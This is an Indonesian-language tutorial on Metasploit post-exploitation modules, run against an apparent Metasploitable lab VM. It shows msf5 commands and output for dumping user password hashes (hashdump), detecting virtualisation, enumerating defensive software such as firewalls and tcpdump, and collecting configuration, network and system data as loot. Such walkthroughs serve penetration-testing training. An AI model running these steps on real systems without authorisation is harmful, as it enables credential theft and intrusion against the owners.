Untuk menggunakan modul post, kita harus menjalankan sesi Meterpreter. Modul-modul ini akan berjalan sebagai pengguna mana pun sampai batas tertentu, tetapi memiliki akses tingkat root sangat ideal karena memungkinkan kita akses tidak terbatas ke sistem.
Modul 1: Hashdump
Untuk memulai, dari prompt utama di Metasploit. Perintah sesi untuk menampilkan sesi saat ini berjalan di latar belakang:
msf5 > sessions msf5 > use post/linux/gather/ >use post/linux/gather/enum_psk >use post/linux/gather/enum_system >use post/linux/gather/hashdump >use post/linux/gather/tor_hiddenservices >use post/linux/gather/enum_configs msf5 > use post/linux/gather/hashdump msf5 post(linux/gather/hashdump) > options msf5 post(linux/gather/hashdump) > set session 3msf5 post(linux/gather/hashdump) > run
Kita dapat melihat hash untuk semua pengguna di sistem sekarang, dan itu bahkan menulis informasi ini ke file untuk kita.
Modul 2: Checkvm
Modul checkvm, ini akan berusaha untuk menentukan apakah targetnya adalah mesin virtual atau tidak, yang dapat menjadi informasi berguna untuk eksploit atau vektor serangan tertentu.
msf5 post(linux/gather/hashdump) > use post/linux/gather/checkvm msf5 post(linux/gather/checkvm) > options msf5 post(linux/gather/checkvm) > set session 3 msf5 post(linux/gather/checkvm) > run [*] Gathering System info .... [+] This appears to be a 'VirtualBox' virtual machine [*] Post module execution completed
Kita dapat melihat bahwa itu menentukan target tampaknya menjadi mesin virtual VirtualBox.
Yang selanjutnya adalah modul enum_protections; ini mencoba menemukan program tertentu pada target yang dapat digunakan untuk mendeteksi serangan, seperti antivirus, firewall, IDS / IPS, perangkat lunak jaringan sniffing, dan lainnya.
msf5 post(linux/gather/checkvm) > use post/linux/gather/enum_protections msf5 post(linux/gather/enum_protections) > options msf5 post(linux/gather/enum_protections) > run [*] Running module against 10.10.0.50 [metasploitable] [*] Info: [*] _ _ _ _ _ _ ____ _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) || | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/ |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____| |_| Warning: Never expose this VM to an untrusted network!Contact: msfdev@metasploit.comLogin with msfadmin/msfadmin to get started [*] Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux [*] Finding system protections... [+] ASLR is enabled [*] Finding installed applications... [+] ufw found: /usr/sbin/ufw [+] iptables found: /sbin/iptables [+] logrotate found: /usr/sbin/logrotate [+] tcpdump found: /usr/sbin/tcpdump [+] aa-status found: /usr/sbin/aa-status [*] Post module execution completed
Kita dapat melihat sepertinya menemukan beberapa perangkat lunak firewall, tcpdump, dan ASLR diaktifkan; informasi semacam ini bisa sangat berharga ketika menyiapkan serangan.
msf5 post(linux/gather/enum_protections) > use post/linux/gather/enum_configs msf5 post(linux/gather/enum_configs) > run
Seperti konfigurasi Apache, sysctl, seseorang, dan lain-lain. Itu juga menyimpan masing-masing file yang ditemukan di direktori untuk digunakan nanti. Sebagai contoh, kita dapat melihat konfigurasi Apache dengan menghapus path lengkap file:
msf5 post(linux/gather/enum_configs) > cat /root/.msf4/loot/20190619121027_default_10.10.0.50_linux.enum.conf_509051.txt
Modul enum_network; ini akan mengumpulkan informasi terkait jaringan pada target, seperti alamat IP, rute, port terbuka, konfigurasi SSH, dan informasi DNS.
msf5 post(linux/gather/enum_configs) > use post/linux/gather/enum_network msf5 post(linux/gather/enum_network) > run
Kita bisa melihat pengumpulan informasi jaringan yang besar, semuanya dapat berguna bagi penyerang. Sebagai contoh, kita dapat melihat file konfigurasi jaringan:
msf5 post(linux/gather/enum_network) > cat /root/.msf4/loot/20190619121247_default_10.10.0.50_linux.enum.netwo_661472.txt
Modul 6: enum_system
modul enum_system; ini akan mengumpulkan informasi sistem tentang target, termasuk versi Linux, paket yang diinstal, menjalankan layanan, pekerjaan cron, dan akun pengguna. Sekali lagi, ini semua hal yang dapat ditemukan secara manual, tetapi terkadang lebih masuk akal untuk melakukannya untuk Anda semua sekaligus.
msf5 post(linux/gather/enum_network) > use post/linux/gather/enum_system msf5 post(linux/gather/enum_system) > run msf5 post(linux/gather/enum_system) > cat /root/.msf4/loot/20190619121500_default_10.10.0.50_linux.enum.syste_739938.txt
Penjelasan Akhir (Kata Kunci)
kita telah menjelajahi beberapa modul pos Metasploit untuk mengumpulkan informasi berharga tentang target. Kita membahas modul untuk memeriksa perlindungan apa yang ada dan apakah sistem itu VM atau tidak, modul untuk menemukan informasi konfigurasi yang berkaitan dengan jaringan dan perangkat lunak umum, dan bahkan modul untuk membuang hash kata sandi.
Meskipun semua informasi ini dapat dikumpulkan secara manual, Metasploit membuat pekerjaan menjadi cepat dan tidak menyakitkan.